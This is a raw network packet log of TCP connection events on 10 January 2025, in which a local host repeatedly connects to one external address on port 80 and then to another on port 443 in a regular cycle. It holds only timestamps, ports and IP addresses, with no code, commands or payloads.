Jan 10, 2025 22:32:21.908744097 CET	50029	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:21.908871889 CET	50029	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:21.913628101 CET	80	50029	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:22.613194942 CET	80	50029	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:22.614609957 CET	50030	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:22.614660978 CET	443	50030	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:22.614942074 CET	50030	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:22.615238905 CET	50030	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:22.615247965 CET	443	50030	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:22.656692028 CET	50029	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:23.236653090 CET	443	50030	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:23.238934994 CET	50030	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:23.238962889 CET	443	50030	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:23.239059925 CET	50030	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:23.239068985 CET	443	50030	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:23.550173044 CET	443	50030	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:23.550252914 CET	443	50030	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:23.550339937 CET	50030	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:23.550847054 CET	50030	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:23.554575920 CET	50029	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:23.556099892 CET	50031	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:23.559679031 CET	80	50029	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:23.560949087 CET	80	50031	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:23.561000109 CET	50029	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:23.561032057 CET	50031	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:23.561160088 CET	50031	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:23.565931082 CET	80	50031	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:24.274621964 CET	80	50031	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:24.275913954 CET	50032	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:24.275959015 CET	443	50032	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:24.276218891 CET	50032	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:24.276496887 CET	50032	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:24.276504993 CET	443	50032	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:24.328485012 CET	50031	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:24.928863049 CET	443	50032	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:24.930567026 CET	50032	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:24.930597067 CET	443	50032	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:24.930649042 CET	50032	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:24.930656910 CET	443	50032	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:25.157852888 CET	443	50032	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:25.157942057 CET	443	50032	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:25.158602953 CET	50032	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:25.158832073 CET	50032	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:25.161580086 CET	50031	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:25.162455082 CET	50033	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:25.166594028 CET	80	50031	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:25.167278051 CET	80	50033	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:25.167455912 CET	50031	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:25.167495966 CET	50033	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:25.167644024 CET	50033	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:25.172404051 CET	80	50033	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:25.873476982 CET	80	50033	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:25.874872923 CET	50034	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:25.874923944 CET	443	50034	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:25.875016928 CET	50034	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:25.875523090 CET	50034	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:25.875541925 CET	443	50034	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:25.922286987 CET	50033	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:26.482964039 CET	443	50034	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:26.485264063 CET	50034	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:26.485281944 CET	443	50034	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:26.485388041 CET	50034	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:26.485394955 CET	443	50034	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:26.822664022 CET	443	50034	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:26.822761059 CET	443	50034	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:26.823009014 CET	50034	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:26.823304892 CET	50034	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:26.826282978 CET	50033	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:26.827486038 CET	50035	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:26.831346035 CET	80	50033	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:26.831413984 CET	50033	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:26.832345009 CET	80	50035	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:26.832416058 CET	50035	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:26.832545996 CET	50035	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:26.837300062 CET	80	50035	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:27.508225918 CET	80	50035	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:27.509763956 CET	50036	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:27.509828091 CET	443	50036	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:27.509979010 CET	50036	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:27.510225058 CET	50036	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:27.510241985 CET	443	50036	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:27.563074112 CET	50035	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:28.145788908 CET	443	50036	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:28.147820950 CET	50036	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:28.147852898 CET	443	50036	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:28.148000956 CET	50036	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:28.148010015 CET	443	50036	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:28.441713095 CET	443	50036	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:28.441804886 CET	443	50036	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:28.442033052 CET	50036	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:28.442363977 CET	50036	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:28.446587086 CET	50035	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:28.448267937 CET	50037	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:28.452104092 CET	80	50035	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:28.452172041 CET	50035	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:28.453353882 CET	80	50037	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:28.453422070 CET	50037	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:28.453649998 CET	50037	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:28.458678961 CET	80	50037	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:29.165435076 CET	80	50037	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:29.167028904 CET	50038	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:29.167084932 CET	443	50038	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:29.167181015 CET	50038	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:29.167486906 CET	50038	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:29.167504072 CET	443	50038	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:29.219155073 CET	50037	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:29.801461935 CET	443	50038	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:29.807502031 CET	50038	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:29.807523012 CET	443	50038	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:29.807595968 CET	50038	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:29.807614088 CET	443	50038	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:30.103522062 CET	443	50038	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:30.103614092 CET	443	50038	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:30.103775978 CET	50038	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:30.104208946 CET	50038	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:30.107108116 CET	50037	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:30.108155966 CET	50039	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:30.112057924 CET	80	50037	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:30.112148046 CET	50037	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:30.112956047 CET	80	50039	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:30.113032103 CET	50039	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:30.113130093 CET	50039	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:30.117852926 CET	80	50039	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:30.789267063 CET	80	50039	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:30.790651083 CET	50040	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:30.790694952 CET	443	50040	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:30.790754080 CET	50040	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:30.791063070 CET	50040	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:30.791074991 CET	443	50040	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:30.844142914 CET	50039	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:31.426683903 CET	443	50040	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:31.428514004 CET	50040	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:31.428541899 CET	443	50040	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:31.428587914 CET	50040	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:31.428596020 CET	443	50040	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:31.717070103 CET	443	50040	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:31.717158079 CET	443	50040	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:31.717262983 CET	50040	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:31.717775106 CET	50040	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:31.724844933 CET	49982	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:31.725816011 CET	50039	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:31.730778933 CET	80	50039	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:31.730894089 CET	50039	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:31.746767998 CET	50041	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:31.751703978 CET	80	50041	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:31.751846075 CET	50041	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:31.751950979 CET	50041	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:31.756814957 CET	80	50041	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:32.456656933 CET	80	50041	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:32.457932949 CET	50042	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:32.457982063 CET	443	50042	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:32.458070993 CET	50042	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:32.458425999 CET	50042	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:32.458442926 CET	443	50042	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:32.500381947 CET	50041	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:33.078188896 CET	443	50042	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:33.080349922 CET	50042	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:33.080360889 CET	443	50042	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:33.080461025 CET	50042	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:33.080465078 CET	443	50042	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:33.367795944 CET	443	50042	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:33.367885113 CET	443	50042	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:33.368005991 CET	50042	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:33.368503094 CET	50042	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:33.371624947 CET	50041	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:33.372574091 CET	50043	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:33.376596928 CET	80	50041	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:33.377372980 CET	80	50043	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:33.377446890 CET	50041	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:33.377479076 CET	50043	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:33.377614021 CET	50043	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:33.382361889 CET	80	50043	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:34.070358038 CET	80	50043	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:34.073172092 CET	50044	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:34.073216915 CET	443	50044	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:34.073591948 CET	50044	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:34.073718071 CET	50044	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:34.073729038 CET	443	50044	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:34.125365019 CET	50043	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:34.681334972 CET	443	50044	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:34.683634996 CET	50044	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:34.683653116 CET	443	50044	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:34.684689045 CET	50044	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:34.684710026 CET	443	50044	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:34.949570894 CET	443	50044	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:34.949660063 CET	443	50044	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:34.949776888 CET	50044	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:34.950274944 CET	50044	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:34.953500032 CET	50043	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:34.955495119 CET	50045	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:34.958446980 CET	80	50043	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:34.958508015 CET	50043	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:34.960275888 CET	80	50045	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:34.961524010 CET	50045	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:34.961698055 CET	50045	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:34.966437101 CET	80	50045	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:35.641462088 CET	80	50045	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:35.643032074 CET	50046	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:35.643089056 CET	443	50046	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:35.643322945 CET	50046	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:35.647674084 CET	50046	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:35.647689104 CET	443	50046	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:35.688036919 CET	50045	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:36.267556906 CET	443	50046	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:36.271612883 CET	50046	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:36.271631956 CET	443	50046	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:36.272002935 CET	50046	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:36.272011042 CET	443	50046	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:36.636044979 CET	443	50046	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:36.636136055 CET	443	50046	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:36.636210918 CET	50046	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:36.636749029 CET	50046	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:36.639585972 CET	50045	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:36.640857935 CET	50047	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:36.644531965 CET	80	50045	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:36.645566940 CET	50045	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:36.645618916 CET	80	50047	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:36.645812035 CET	50047	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:36.645812035 CET	50047	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:36.650607109 CET	80	50047	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:37.318486929 CET	80	50047	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:37.319823027 CET	50048	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:37.319864035 CET	443	50048	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:37.320048094 CET	50048	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:37.320379972 CET	50048	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:37.320394039 CET	443	50048	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:37.359749079 CET	50047	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:37.957845926 CET	443	50048	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:37.962557077 CET	50048	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:37.962572098 CET	443	50048	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:37.963331938 CET	50048	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:37.963339090 CET	443	50048	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:38.396169901 CET	443	50048	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:38.396249056 CET	443	50048	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:38.396306038 CET	50048	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:38.396855116 CET	50048	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:38.399920940 CET	50047	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:38.401021957 CET	50049	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:38.405852079 CET	80	50047	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:38.405932903 CET	50047	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:38.406742096 CET	80	50049	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:38.406829119 CET	50049	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:38.407104015 CET	50049	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:38.412826061 CET	80	50049	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:39.079986095 CET	80	50049	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:39.098979950 CET	50050	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:39.099018097 CET	443	50050	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:39.099102020 CET	50050	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:39.103265047 CET	50050	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:39.103274107 CET	443	50050	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:39.125412941 CET	50049	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:39.726206064 CET	443	50050	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:39.727818012 CET	50050	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:39.727840900 CET	443	50050	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:39.727916956 CET	50050	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:39.727922916 CET	443	50050	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:40.009449005 CET	443	50050	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:40.009541988 CET	443	50050	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:40.009615898 CET	50050	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:40.009979963 CET	50050	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:40.012761116 CET	50049	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:40.013820887 CET	50051	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:40.017714977 CET	80	50049	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:40.017795086 CET	50049	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:40.018554926 CET	80	50051	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:40.018627882 CET	50051	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:40.018714905 CET	50051	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:40.023516893 CET	80	50051	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:40.723712921 CET	80	50051	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:40.724798918 CET	50052	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:40.724841118 CET	443	50052	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:40.724919081 CET	50052	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:40.725169897 CET	50052	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:40.725186110 CET	443	50052	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:40.765984058 CET	50051	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:41.332916021 CET	443	50052	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:41.334831953 CET	50052	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:41.334856033 CET	443	50052	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:41.334949017 CET	50052	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:41.334956884 CET	443	50052	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:41.690783024 CET	443	50052	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:41.690865993 CET	443	50052	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:41.691129923 CET	50052	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:41.691345930 CET	50052	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:41.694014072 CET	50051	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:41.695091963 CET	50053	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:41.699033022 CET	80	50051	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:41.699112892 CET	50051	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:41.699950933 CET	80	50053	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:41.700042963 CET	50053	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:41.700366020 CET	50053	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:41.705179930 CET	80	50053	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:42.399460077 CET	80	50053	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:42.400676966 CET	50054	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:42.400728941 CET	443	50054	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:42.400810957 CET	50054	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:42.401176929 CET	50054	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:42.401196957 CET	443	50054	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:42.453506947 CET	50053	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:43.018012047 CET	443	50054	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:43.019512892 CET	50054	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:43.019534111 CET	443	50054	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:43.019666910 CET	50054	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:43.019671917 CET	443	50054	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:43.422667027 CET	443	50054	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:43.422765970 CET	443	50054	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:43.423093081 CET	50054	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:43.423207998 CET	50054	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:43.426372051 CET	50053	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:43.427475929 CET	50055	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:43.431396008 CET	80	50053	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:43.431464911 CET	50053	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:43.432368994 CET	80	50055	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:43.432451963 CET	50055	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:43.432569027 CET	50055	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:43.437361956 CET	80	50055	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:44.133246899 CET	80	50055	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:44.134448051 CET	50056	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:44.134495974 CET	443	50056	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:44.134556055 CET	50056	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:44.134841919 CET	50056	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:44.134852886 CET	443	50056	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:44.187886953 CET	50055	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:44.753371000 CET	443	50056	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:44.755068064 CET	50056	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:44.755101919 CET	443	50056	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:44.755191088 CET	50056	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:44.755197048 CET	443	50056	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:45.173753977 CET	443	50056	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:45.173872948 CET	443	50056	149.154.167.220	192.168.2.3
Jan 10, 2025 22:32:45.174036026 CET	50056	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:45.174596071 CET	50056	443	192.168.2.3	149.154.167.220
Jan 10, 2025 22:32:45.179150105 CET	50055	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:45.180109024 CET	50057	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:45.184118986 CET	80	50055	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:45.184194088 CET	50055	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:45.184952021 CET	80	50057	132.226.247.73	192.168.2.3
Jan 10, 2025 22:32:45.185213089 CET	50057	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:45.185302973 CET	50057	80	192.168.2.3	132.226.247.73
Jan 10, 2025 22:32:45.190042973 CET	80	50057	132.226.247.73	192.168.2.3
